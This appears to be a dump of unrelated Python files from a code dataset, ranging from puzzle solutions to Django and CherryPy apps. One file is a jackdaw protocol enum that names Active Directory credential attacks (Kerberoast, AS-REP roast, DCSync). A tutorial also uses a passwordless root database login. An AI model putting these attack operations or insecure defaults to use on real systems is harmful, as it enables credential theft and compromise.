# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'robin'
copyright = '2016, Peng Zhou'
author = 'Peng Zhou'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinxdoc'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'robindoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'robin.tex', 'robin Documentation',
'Peng Zhou', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'robin', 'robin Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'robin', 'robin Documentation',
author, 'robin', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
| [
"zhoupenggeni@gmail.com"
] | zhoupenggeni@gmail.com |
1f956806ded26833499f7cf94f5aa6c07baf85ca | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_62/226.py | 7ad140bdb3f8909e25cea0499824da525e9f42ab | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | fi=open("A-large.in")#")
import sys
sys.stdout=open("out.out",'w')
T=int(fi.readline())
for i in range(T):
N=int(fi.readline())
lst=[map(int,fi.readline().split()) for j in range(N)]
cnt=0
for j in range(N):
for k in range(j+1,N):
cnt+=(lst[k][0]>lst[j][0])==(lst[k][1]<lst[j][1])
print "Case #%d: %d"%(i+1,cnt)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
d2e0473e0664d8e1a1e333368970ecc639a0840e | 1e8142725aa06844713d18fa38c6779aff8f8171 | /tndata_backend/notifications/views.py | cfeca79f817dd6db55ce8cd517ebe98b2e9b6884 | [
"MIT"
] | permissive | tndatacommons/tndata_backend | 8f4db3e5cf5272901c9087a85e21d7560240bb3b | 3d22179c581ab3da18900483930d5ecc0a5fca73 | refs/heads/master | 2020-12-03T07:53:17.339769 | 2017-03-27T06:18:58 | 2017-03-27T06:18:58 | 68,407,220 | 1 | 2 | null | 2017-03-27T06:18:59 | 2016-09-16T18:59:16 | Python | UTF-8 | Python | false | false | 6,049 | py | from collections import defaultdict
from datetime import datetime, timedelta
from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.http import JsonResponse
from django.shortcuts import get_object_or_404, render, redirect
from django.utils import timezone
from . import queue
from .forms import GCMMessageForm
from .models import GCMMessage
@login_required
def send_message(request):
"""A quick & easy way to send test notifications."""
if request.method == "POST":
form = GCMMessageForm(request.POST)
if form.is_valid():
msg = form.save(commit=False)
msg.user = request.user
msg.deliver_on = timezone.now()
msg.priority = GCMMessage.HIGH
msg.save()
msg.send()
messages.success(request, "Your notification has been sent")
return redirect(reverse("notifications:view", args=[msg.id]))
else:
form = GCMMessageForm()
context = {
'form': form,
}
return render(request, 'notifications/send_message.html', context)
@login_required
def view_message(request, message_id):
msg = get_object_or_404(GCMMessage, pk=message_id)
return render(request, 'notifications/view_message.html', {'message': msg})
@user_passes_test(lambda u: u.is_staff, login_url='/')
def dashboard(request):
"""A simple dashboard for enqueued GCM notifications."""
devices = None
User = get_user_model()
# If we have specified a user, show their Queue details.
date = request.GET.get('date', None) or None
if date is None:
date = timezone.now().date()
else:
date = datetime.strptime(date, "%Y-%m-%d").date()
user = None
email = request.GET.get('user', None)
user_queues = [] # Prioritized user queue
try:
user = User.objects.get(email__icontains=email)
devices = user.gcmdevice_set.count()
user_queues.append(queue.UserQueue.get_data(user, date=date))
date = date + timedelta(days=1)
user_queues.append(queue.UserQueue.get_data(user, date=date))
except (User.DoesNotExist, ValueError, TypeError):
if user is not None:
messages.warning(request, "No data found for '{}'".format(user))
except User.MultipleObjectsReturned:
messages.warning(request, "Multiple Users found for '{}'".format(user))
if user:
# Get all the enqueued jobs, & keep a list of the Job.ID values.
jobs = queue.messages()
job_ids = [job.args[0] for job, _ in jobs]
# Build a dict of the user's message data matching those Jobs.
message_data = defaultdict(dict)
for msg in user.gcmmessage_set.filter(pk__in=job_ids):
message_data[msg.id] = {
'id': msg.id,
'title': msg.title,
'user_id': msg.user_id,
'email': msg.user.email,
'message': msg.message,
'title': msg.title,
'date_string': msg.deliver_on.strftime("%Y-%m-%d"),
'queue_id': msg.queue_id,
}
# Restrict the list of jobs to those intended for the given user.
jobs = [
(job, scheduled_for, message_data[job.args[0]])
for job, scheduled_for in jobs if job.args[0] in message_data
]
else:
jobs = []
context = {
'devices': devices,
'email': email,
'num_jobs': queue.get_scheduler().count(),
'jobs': jobs,
'metrics': ['GCM Message Sent', 'GCM Message Scheduled'],
'selected_date': date,
'selected_user': user,
'user_queues': user_queues,
}
return render(request, "notifications/index.html", context)
@user_passes_test(lambda u: u.is_staff, login_url='/')
def userqueue(request, user_id, date):
"""Return UserQueue details; i.e. the sheduled notifications/jobs for the
user for a given date.
"""
user = get_object_or_404(get_user_model(), pk=user_id)
date = datetime.strptime(date, '%Y-%m-%d')
data = queue.UserQueue.get_data(user, date)
# massage that data a bit.
results = {}
for key, values in data.items():
if 'count' in key:
results['count'] = values
elif 'low' in key:
results['low'] = values
elif 'medium' in key:
results['medium'] = values
elif 'high' in key:
results['high'] = values
results['date'] = date.strftime("%Y-%m-%d")
results['user'] = user.get_full_name()
return JsonResponse(results)
@user_passes_test(lambda u: u.is_staff, login_url='/')
def cancel_job(request):
    """Cancel the enqueued job whose ID was POSTed, if it can be found."""
    job_id = request.POST.get('job_id', None)
    if request.method == "POST" and job_id:
        # Lazily scan the queue for the first job with a matching ID.
        match = next(
            (job for job, _ in queue.messages() if job.id == job_id),
            None,
        )
        if match is not None:
            match.cancel()
            messages.success(request, "That notification has been cancelled")
    return redirect("notifications:dashboard")
@user_passes_test(lambda u: u.is_staff, login_url='/')
def cancel_all_jobs(request):
    """Cancel queued messages: either only orphaned jobs or every job."""
    count = 0
    if request.method == "POST":
        if request.POST.get('orphaned') == 'on':
            # Orphaned jobs are enqueued jobs with no matching GCMMessage
            # (e.g. a user was deleted but GCMMessage's delete signal
            # handler never fired).
            known_ids = list(GCMMessage.objects.values_list('queue_id', flat=True))
            targets = [job for job, _ in queue.messages() if job.id not in known_ids]
        else:
            targets = [job for job, _ in queue.messages()]
        for job in targets:
            job.cancel()
            count += 1
    messages.success(request, "Cancelled {} notifications.".format(count))
    return redirect("notifications:dashboard")
| [
"brad@bradmontgomery.net"
] | brad@bradmontgomery.net |
8b225ee618d2c0e039ce2c2d41cf4951ba7b6028 | c1c5a8dc79cacf3b419bad77881213c5db2f80c3 | /Kattis/Hangman.py | 540add223680299e4c243eee7ae10b1621c955f5 | [] | no_license | EoinDavey/Competitive | 7ff8b6b6225814ac60c3ace659bb63190eb52420 | b2b6909b93f5c073b684477f8a4b06dac22ec678 | refs/heads/master | 2023-01-08T00:06:19.076941 | 2022-12-26T14:00:31 | 2022-12-26T14:00:31 | 67,259,478 | 17 | 1 | null | 2022-01-19T18:17:59 | 2016-09-02T22:46:26 | C++ | UTF-8 | Python | false | false | 189 | py | w = set(raw_input())
# `w` (built on the line above) holds the distinct letters of the target word.
r = set()  # distinct correct letters guessed so far
s = raw_input()  # the player's sequence of guesses
i = 0  # number of wrong guesses
for c in s:
    if c in w:
        r.add(c)
    else:
        i+=1
    # Stop as soon as every distinct letter of the word has been revealed.
    if len(r) == len(w):
        break
# Hangman rule as implemented here: fewer than 10 wrong guesses wins.
# NOTE(review): repeated wrong guesses each count again — presumably the
# input guarantees distinct guesses; confirm against the problem statement.
if i < 10:
    print "WIN"
else:
    print "LOSE"
| [
"eoind@vey.ie"
] | eoind@vey.ie |
d03b9dea06bfefc925406420ce6441c7af6a6826 | 3da69696601b2b3ad7bc1285a5f0343c7eafea80 | /lc417.py | 4fde0896c49f578ad3744a0571ca5a994537d5c7 | [] | no_license | GeorgyZhou/Leetcode-Problem | ee586463a2e4e75c910c095bdc057f1be70b5c1b | d6fac85a94a7188e93d4e202e67b6485562d12bd | refs/heads/master | 2021-06-30T15:58:04.698200 | 2020-12-18T22:55:49 | 2020-12-18T22:55:49 | 66,054,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,106 | py | class Solution(object):
def pacificAtlantic(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[List[int]]
"""
import heapq
row = len(matrix)
if row == 0:
return []
col = len(matrix[0])
if col == 0:
return []
ret = []
pac = dict()
alt = dict()
heapalt = []
heappac = []
pacvisited = dict()
altvisited = dict()
for i in xrange(row):
pac[(i,0)] = 1
pacvisited[(i,0)] = 1
alt[(i,col-1)] = 1
altvisited[(i, col-1)] = 1
heapq.heappush(heapalt, (matrix[i][col-1], i, col-1))
heapq.heappush(heappac, (matrix[i][0], i, 0))
for j in xrange(1, col):
pac[(0,j)] = 1
pacvisited[(0, j)] = 1
alt[(row-1, col-1-j)] = 1
altvisited[(row-1, col-1-j)] = 1
heapq.heappush(heappac, (matrix[0][j], 0, j))
heapq.heappush(heapalt, (matrix[row-1][col-1-j], row-1, col-1-j))
while len(heappac) > 0:
height, i, j = heapq.heappop(heappac)
for x, y in [(i-1, j), (i+1, j), (i, j-1), (i, j+1)]:
if 0 <= x < row and 0<= y < col and not pacvisited.has_key((x, y)) and height <= matrix[x][y]:
pac[(x,y)] = 1
heapq.heappush(heappac, (matrix[x][y], x, y))
pacvisited[(x,y)] = 1
while len(heapalt) > 0:
height, i, j = heapq.heappop(heapalt)
for x, y in [(i-1, j), (i+1, j), (i, j-1), (i, j+1)]:
if 0 <= x < row and 0<= y < col and not altvisited.has_key((x, y)) and height <= matrix[x][y]:
alt[(x,y)] = 1
heapq.heappush(heapalt, (matrix[x][y], x, y))
altvisited[(x,y)] = 1
for x in xrange(row):
for y in xrange(col):
if alt.has_key((x, y)) and pac.has_key((x, y)):
ret.append([x, y])
return ret
| [
"michaelchouqj@gmail.com"
] | michaelchouqj@gmail.com |
cf9536970a1d384e5d71709808001cf25fb90dc5 | 39e1e256acae3fe9be4434024d42b9bb47bdd02f | /analysis/submissions/844088c7077d499fa3533250ae504e7f_task2-2_1595958872/task2-2/main_patch.py | 9487fafad846fe1eb836cae4a61d574d42fae035 | [] | no_license | neulab/tranx-study | 9fb67b9a2181f0b362e4f97316c502eee4539b19 | e2a7089689f7f95e773e19c8f19513abe4fb8b9b | refs/heads/master | 2023-06-14T04:46:01.010892 | 2021-07-08T09:29:05 | 2021-07-08T09:29:05 | 250,357,553 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 584 | py | from os import listdir
from os.path import isfile, join
from shutil import copyfile
def clean(file):
    """Read *file* (decoded as ISO-8859-1), normalize its line layout and
    return the result as UTF-8 bytes.

    Leading/trailing whitespace is stripped and the remaining lines are
    re-joined with a single ``\\n`` each.
    """
    with open(file, 'r', encoding="ISO-8859-1") as f:
        print(file)  # progress log: show which file is being processed
        # The previous identity comprehension inside join() was redundant;
        # join the split lines directly.
        return '\n'.join(f.read().strip().splitlines()).encode('utf-8')
# Mirror every regular file from data/ into output/: .txt files are
# rewritten through clean() (stripped, newline-normalized, UTF-8 encoded),
# everything else is copied verbatim.
# NOTE(review): assumes the output/ directory already exists — confirm.
for fname in listdir('data/'):
    fpath = join('data/', fname)
    if isfile(fpath):  # skip subdirectories
        output_path = join('output/', fname)
        if fpath.endswith('.txt'):
            # Text file: write the normalized bytes produced by clean().
            with open(output_path, 'wb') as out_f:
                out_f.write(clean(fpath))
        else:
            # Non-text file: byte-for-byte copy.
            copyfile(fpath, output_path)
| [
"frankxu2004@gmail.com"
] | frankxu2004@gmail.com |
4814556209a63b3749122e9e8c239c4aabab5d69 | 75402b6c851a12ae41359fdd83e89d2160c308af | /zentral/contrib/mdm/views/base.py | e87ecd36b7d41addde0cb28c75645741a6dd1b1d | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-commercial-license"
] | permissive | neocode12/zentral | 7b05aeeb823a5a3d7d268cc2b01e0bf1a5e4be71 | 9ecc8d8334148627fcccaa875f100adacd7a018b | refs/heads/main | 2023-04-09T12:06:45.355559 | 2023-03-15T14:05:05 | 2023-03-15T14:05:05 | 327,651,549 | 0 | 0 | Apache-2.0 | 2021-01-07T15:30:00 | 2021-01-07T15:30:00 | null | UTF-8 | Python | false | false | 1,481 | py | from django.core.exceptions import SuspiciousOperation
from zentral.utils.http import user_agent_and_ip_address_from_request
class PostEventMixin:
    """View mixin that captures request metadata once per request and
    posts machine events via the view's ``event_class``.
    """

    # Class-level default; set to True on the instance once setup has run.
    _setup_done = False

    def dispatch(self, request, *args, **kwargs):
        # Capture request metadata before any handler method runs.
        self.setup_with_request(request)
        return super().dispatch(request, *args, **kwargs)

    def setup_with_request(self, request):
        if self._setup_done:
            return
        self.user_agent, self.ip = user_agent_and_ip_address_from_request(request)
        self.serial_number = None
        self.udid = None
        self.realm_user = None
        self._setup_done = True

    def post_event(self, status, **event_payload):
        event_payload["status"] = status
        if self.udid:
            event_payload["udid"] = self.udid
        realm_user = self.realm_user
        if realm_user:
            realm = realm_user.realm
            event_payload["realm"] = {"pk": str(realm.pk),
                                      "name": realm.name}
            event_payload["realm_user"] = {"pk": str(realm_user.pk),
                                           "username": realm_user.username}
        self.event_class.post_machine_request_payloads(
            self.serial_number, self.user_agent, self.ip, [event_payload]
        )

    def abort(self, reason, **event_payload):
        if reason:
            event_payload["reason"] = reason
        self.post_event("failure", **event_payload)
        raise SuspiciousOperation
| [
"eric.falconnier@112hz.com"
] | eric.falconnier@112hz.com |
57b0f77bec4f7eec3adf821f20ae402b5af51d66 | 2ff7e53d5e512cd762217ca54317982e07a2bb0c | /eve-8.51.857815/carbon/common/lib/cherrypy/tutorial/bonus-sqlobject.py | 28b698ecccf4841092d2c84d53dee0097cbcc5cf | [] | no_license | nanxijw/Clara-Pretty-One-Dick | 66d3d69426642b79e8fd4cc8e0bec23adeeca6d6 | 50de3488a2140343c364efc2615cf6e67f152be0 | refs/heads/master | 2021-01-19T09:25:07.555284 | 2015-02-17T21:49:33 | 2015-02-17T21:49:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,502 | py | #Embedded file name: carbon/common/lib/cherrypy/tutorial\bonus-sqlobject.py
"""
Bonus Tutorial: Using SQLObject
This is a silly little contacts manager application intended to
demonstrate how to use SQLObject from within a CherryPy2 project. It
also shows how to use inline Cheetah templates.
SQLObject is an Object/Relational Mapper that allows you to access
data stored in an RDBMS in a pythonic fashion. You create data objects
as Python classes and let SQLObject take care of all the nasty details.
This code depends on the latest development version (0.6+) of SQLObject.
You can get it from the SQLObject Subversion server. You can find all
necessary information at <http://www.sqlobject.org>. This code will NOT
work with the 0.5.x version advertised on their website!
This code also depends on a recent version of Cheetah. You can find
Cheetah at <http://www.cheetahtemplate.org>.
After starting this application for the first time, you will need to
access the /reset URI in order to create the database table and some
sample data. Accessing /reset again will drop and re-create the table,
so you may want to be careful. :-)
This application isn't supposed to be fool-proof, it's not even supposed
to be very GOOD. Play around with it some, browse the source code, smile.
:)
-- Hendrik Mans <hendrik@mans.de>
"""
import cherrypy
from Cheetah.Template import Template
from sqlobject import *
__connection__ = 'mysql://root:@localhost/test'
class Contact(SQLObject):
lastName = StringCol(length=50, notNone=True)
firstName = StringCol(length=50, notNone=True)
phone = StringCol(length=30, notNone=True, default='')
email = StringCol(length=30, notNone=True, default='')
url = StringCol(length=100, notNone=True, default='')
class ContactManager:
def index(self):
contacts = Contact.select()
template = Template('\n <h2>All Contacts</h2>\n\n #for $contact in $contacts\n <a href="mailto:$contact.email">$contact.lastName, $contact.firstName</a>\n [<a href="./edit?id=$contact.id">Edit</a>]\n [<a href="./delete?id=$contact.id">Delete</a>]\n <br/>\n #end for\n\n <p>[<a href="./edit">Add new contact</a>]</p>\n ', [locals(), globals()])
return template.respond()
index.exposed = True
def edit(self, id = 0):
id = int(id)
if id > 0:
contact = Contact.get(id)
title = 'Edit Contact'
else:
contact = None
title = 'New Contact'
template = Template('\n <h2>$title</h2>\n\n <form action="./store" method="POST">\n <input type="hidden" name="id" value="$id" />\n Last Name: <input name="lastName" value="$getVar(\'contact.lastName\', \'\')" /><br/>\n First Name: <input name="firstName" value="$getVar(\'contact.firstName\', \'\')" /><br/>\n Phone: <input name="phone" value="$getVar(\'contact.phone\', \'\')" /><br/>\n Email: <input name="email" value="$getVar(\'contact.email\', \'\')" /><br/>\n URL: <input name="url" value="$getVar(\'contact.url\', \'\')" /><br/>\n <input type="submit" value="Store" />\n </form>\n ', [locals(), globals()])
return template.respond()
edit.exposed = True
def delete(self, id):
contact = Contact.get(int(id))
contact.destroySelf()
return 'Deleted. <a href="./">Return to Index</a>'
delete.exposed = True
def store(self, lastName, firstName, phone, email, url, id = None):
if id and int(id) > 0:
contact = Contact.get(int(id))
contact.set(lastName=lastName, firstName=firstName, phone=phone, email=email, url=url)
else:
contact = Contact(lastName=lastName, firstName=firstName, phone=phone, email=email, url=url)
return 'Stored. <a href="./">Return to Index</a>'
store.exposed = True
def reset(self):
Contact.dropTable(True)
Contact.createTable()
Contact(firstName='Hendrik', lastName='Mans', email='hendrik@mans.de', phone='++49 89 12345678', url='http://www.mornography.de')
return 'reset completed!'
reset.exposed = True
print "If you're running this application for the first time, please go to http://localhost:8080/reset once in order to create the database!"
cherrypy.quickstart(ContactManager())
| [
"billchang.e@gmail.com"
] | billchang.e@gmail.com |
7be5c1610311e38a44408af45228a5092697cb36 | 9e765b38a03c2996e221a42c2a0dbc0fe02824cb | /general_interview_qs/serialize_deserialize_binary_tree/binary_search_tree.py | 7d69deb9bc0240ce5a5c30d0940e79d08821b1f2 | [
"Apache-2.0"
] | permissive | angelusualle/algorithms | f709b4ae0c3275cece204d5fb56fd6ec34b4683b | 86286a49db2a755bc57330cb455bcbd8241ea6be | refs/heads/main | 2023-07-02T19:25:11.720114 | 2021-08-12T16:33:00 | 2021-08-12T16:33:00 | 269,791,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | import json
class Node():
def __init__(self, value):
self.value = value
self.left_child = None
self.right_child = None
def serialize_bst(root):
return json.dumps(serialize_bst_recursive(root))
def serialize_bst_recursive(root):
return root and (root.value, serialize_bst_recursive(root.left_child), serialize_bst_recursive(root.right_child))
def deserialize_bst(data):
return deserialize_bst_recursive(json.loads(data))
def deserialize_bst_recursive(data):
if data:
root = Node(data[0])
root.left_child = deserialize_bst_recursive(data[1])
root.right_child = deserialize_bst_recursive(data[2])
return root | [
"angelusualle@gmail.com"
] | angelusualle@gmail.com |
3cce911205ad7d207806b4df38a18d5029619084 | 9b20743ec6cd28d749a4323dcbadb1a0cffb281b | /11_Time_Series_Forecasting_with_Python/08/random_walk_persistence.py | 0a9ec3767d6c6e19c7e37f6146090e3366394702 | [] | no_license | jggrimesdc-zz/MachineLearningExercises | 6e1c7e1f95399e69bba95cdfe17c4f8d8c90d178 | ee265f1c6029c91daff172b3e7c1a96177646bc5 | refs/heads/master | 2023-03-07T19:30:26.691659 | 2021-02-19T08:00:49 | 2021-02-19T08:00:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # persistence forecasts for a random walk
from math import sqrt
from random import random
from random import seed
from sklearn.metrics import mean_squared_error
# generate the random walk
seed(1)
random_walk = list()
random_walk.append(-1 if random() < 0.5 else 1)
for i in range(1, 1000):
movement = -1 if random() < 0.5 else 1
value = random_walk[i - 1] + movement
random_walk.append(value)
# prepare dataset
train_size = int(len(random_walk) * 0.66)
train, test = random_walk[0:train_size], random_walk[train_size:]
# persistence
predictions = list()
history = train[-1]
for i in range(len(test)):
yhat = history
predictions.append(yhat)
history = test[i]
rmse = sqrt(mean_squared_error(test, predictions))
print('Persistence RMSE: %.3f' % rmse)
| [
"jgrimes@jgrimes.tech"
] | jgrimes@jgrimes.tech |
32a2d37244020f9f94575b7edd8b299c75941baa | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03131/s755210567.py | 2089454a42165092751754963ddeb69a197d66c8 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | K, A, B = map(int, input().split())
if B - A <= 2:
print(K + 1)
else:
ans = 0
# 初回のA枚→B枚まで A-1 回かかる
rest = K - A + 1
# このときにはA枚持っている
ans += A
# 残りをすべてA枚→B枚
ans += rest // 2 * (B - A)
if rest % 2 != 0:
ans += 1
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
7379d7c195155642ce162043732d4f0040240093 | 3ad8887aca54daa74b1fe446cb35cd0902e1e9bd | /jackdaw/nest/ws/protocol/cmdtypes.py | dcd8aaa5c412c3cc29a7fc3200dcf7f1c5990f79 | [] | no_license | huangzccn/jackdaw | 6ea5f3f7901c1c64b469ea4c25de0e77a3fc49a2 | 1a9800152fb8f19d5db43fcd235f45f6db2e3878 | refs/heads/master | 2023-08-29T11:44:46.692776 | 2021-10-23T20:00:36 | 2021-10-23T20:00:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,745 | py | import enum
class NestOpCmd(enum.Enum):
GATHER = 'GATHER'
KERBEROAST = 'KERBEROAST'
KERBEROASTRES = 'KERBEROASTRES'
ASREPROAST = 'ASREPROAST'
ASREPROASTRES = 'ASREPROASTRES'
KERBEROSTGS = 'KERBEROSTGS'
KERBEROSTGSRES = 'KERBEROSTGSRES'
KERBEROSTGT = 'KERBEROSTGT'
KERBEROSTGTRES = 'KERBEROSTGTRES'
SMBSESSIONS = 'SMBSESSIONS'
SMBFILES = 'SMBFILES'
SMBDCSYNC = 'SMBDCSYNC'
PATHSHORTEST = 'PATHSHORTEST'
PATHDA = 'PATHDA'
GETOBJINFO = 'GETOBJINFO'
CHANGEAD = 'CHANGEAD'
LISTADS = 'LISTADS'
LISTADSRES = 'LISTADSRES'
OK = 'OK'
ERR = 'ERR'
LOG = 'LOG'
CANCEL = 'CANCEL'
TCPSCAN = 'TCPSCAN'
TCPSCANRES = 'TCPSCANRES'
PATHRES = 'PATHRES'
GATHERSTATUS = 'GATHERSTATUS'
USERRES = 'USERRES'
COMPUTERRES = 'COMPUTERRES'
SMBSESSIONRES = 'SMBSESSIONRES'
SMBSHARERES = 'SMBSHARERES'
SMBLOCALGROUPRES = 'SMBLOCALGROUPRES'
LOADAD = 'LOADAD'
GROUPRES = 'GROUPRES'
EDGERES = 'EDGERES'
EDGEBUFFRES = 'EDGEBUFFRES'
USERBUFFRES = 'USERBUFFRES'
GROUPBUFFRES = 'GROUPBUFFRES'
COMPUTERBUFFRES = 'COMPUTERBUFFRES'
SMBSHAREBUFFRES = 'SMBSHAREBUFFRES'
SMBFILERES = 'SMBFILERES'
ADDCRED = 'ADDCRED'
LISTCRED = 'LISTCRED'
GETCRED = 'GETCRED'
CREDRES = 'CREDRES'
ADDTARGET = 'ADDTARGET'
LISTTARGET = 'LISTTARGET'
GETTARGET = 'GETTARGET'
TARGETRES = 'TARGETRES'
LISTGRAPHS = 'LISTGRAPHS'
CHANGEGRAPH = 'CHANGEGRAPH'
LOADGRAPH = 'LOADGRAPH'
LISTGRAPHRES = 'LISTGRAPHRES'
LISTAGENTS = 'LISTAGENTS'
AGENT = 'AGENT'
OBJOWNED = 'OBJOWNED'
OBJHVT = 'OBJHVT'
WSNETROUTERCONNECT = 'WSNETROUTERCONNECT'
WSNETROUTERDISCONNECT = 'WSNETROUTERDISCONNECT'
NOTIFY = 'NOTIFY'
WSNETROUTER = 'WSNETROUTER'
WSNETLISTROUTERS = 'WSNETLISTROUTERS'
PATHKERB = 'PATHKERB'
PATHASREP = 'PATHASREP'
PATHOWNED = 'PATHOWNED' | [
"info@skelsec.com"
] | info@skelsec.com |
463916eb7f9d2c84f8495c3cd2cf86f69b7f2b47 | b0d0e585c82b29aaabcb141f9f54280559abac69 | /Datastructures/spiral.py | 2b6df640797337c222abd54d3fabf6c6e852253b | [] | no_license | prem1806/python-practice-files | 32a6eb7236a9779dec0fb75d3792c34533e6491c | 3f152e4b62fb7f81e5113dced06b4dc7cce4b440 | refs/heads/master | 2021-05-29T16:59:00.349844 | 2015-10-06T17:58:56 | 2015-10-06T17:58:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 866 | py | def auto(A):
    # Return the elements of matrix A in clockwise spiral order,
    # starting from the top-left corner.
    m = len(A)
    n = len(A[0])  # column count taken from row 0; assumes A is non-empty — TODO confirm
    T = 0      # top boundary (row index)
    B = m - 1  # bottom boundary
    L = 0      # left boundary (column index)
    R = n - 1  # right boundary
    # direction: 0 = left-to-right along the top row,
    #            1 = top-to-bottom along the right column,
    #            2 = right-to-left along the bottom row,
    #            3 = bottom-to-top along the left column.
    direction = 0
    ret = []
    # Loop until the shrinking boundaries cross.
    while T <= B and L <= R:
        if (direction == 0):
            # Consume the top row, then move the top boundary down.
            for i in range(L,R+1):
                ret.append(A[T][i])
            T += 1
            direction = 1
        elif direction == 1:
            # Consume the right column, then move the right boundary left.
            for i in range(T,B+1):
                ret.append(A[i][R])
            R -= 1
            direction = 2
        elif direction == 2:
            # Consume the bottom row right-to-left, then raise the bottom boundary.
            for i in range(R, L - 1, -1):
                ret.append(A[B][i])
            B -= 1
            direction = 3
        else:
            # Consume the left column bottom-to-top, then move the left boundary right.
            for i in range(B,T-1, -1):
                ret.append(A[i][L])
            L += 1
            direction = 0
    return ret
# Ad-hoc smoke test (Python 2 print statement). The rows have different
# lengths (5, 7, 7); auto() only indexes columns up to len(A[0]) - 1,
# so the extra trailing elements of the longer rows are never read.
A = [[1,2,3,4,5],[9,5,3,6,6,9,3],[1,5,3,8,6,4,2]]
print auto(A)
| [
"rohith.uppala369@gmail.com"
] | rohith.uppala369@gmail.com |
d4ed1afb2f18e5872a87afc51949c67782c4d55e | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_cams.py | 79899c97da6b6f7a5750ef111987199a2e5323fe | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py |
from xai.brain.wordbase.nouns._cam import _CAM
#calss header
class _CAMS(_CAM, ):
def __init__(self,):
_CAM.__init__(self)
self.name = "CAMS"
self.specie = 'nouns'
self.basic = "cam"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
